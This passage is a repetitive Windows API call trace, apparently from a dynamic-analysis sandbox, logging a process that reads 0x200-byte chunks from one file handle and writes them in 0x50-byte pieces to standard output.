lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.014] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.014] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, 
lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] GetFileType (hFile=0x50) returned 0x1 [0233.015] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.015] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.015] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.016] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.016] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, 
lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] GetFileType (hFile=0x50) returned 0x1 [0233.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.016] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.017] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.017] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0233.017] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] GetFileType (hFile=0x50) returned 0x1 [0233.017] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.017] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] 
GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] GetFileType (hFile=0x50) returned 0x1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.018] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.018] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.018] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.018] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | 
out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.019] GetFileType (hFile=0x50) returned 0x1 [0233.019] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, 
lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.020] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.020] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.020] GetFileType (hFile=0x50) returned 0x1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 
[0233.020] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.020] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] GetFileType (hFile=0x50) returned 0x1 [0233.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.021] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.022] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) 
returned 1 [0233.022] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.022] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] GetFileType (hFile=0x50) returned 0x1 [0233.022] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.022] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.023] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.023] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] GetFileType (hFile=0x50) returned 0x1 [0233.023] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.023] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, 
lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.024] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.024] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.025] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.025] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.025] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.025] GetFileType (hFile=0x50) returned 0x1 [0233.025] 
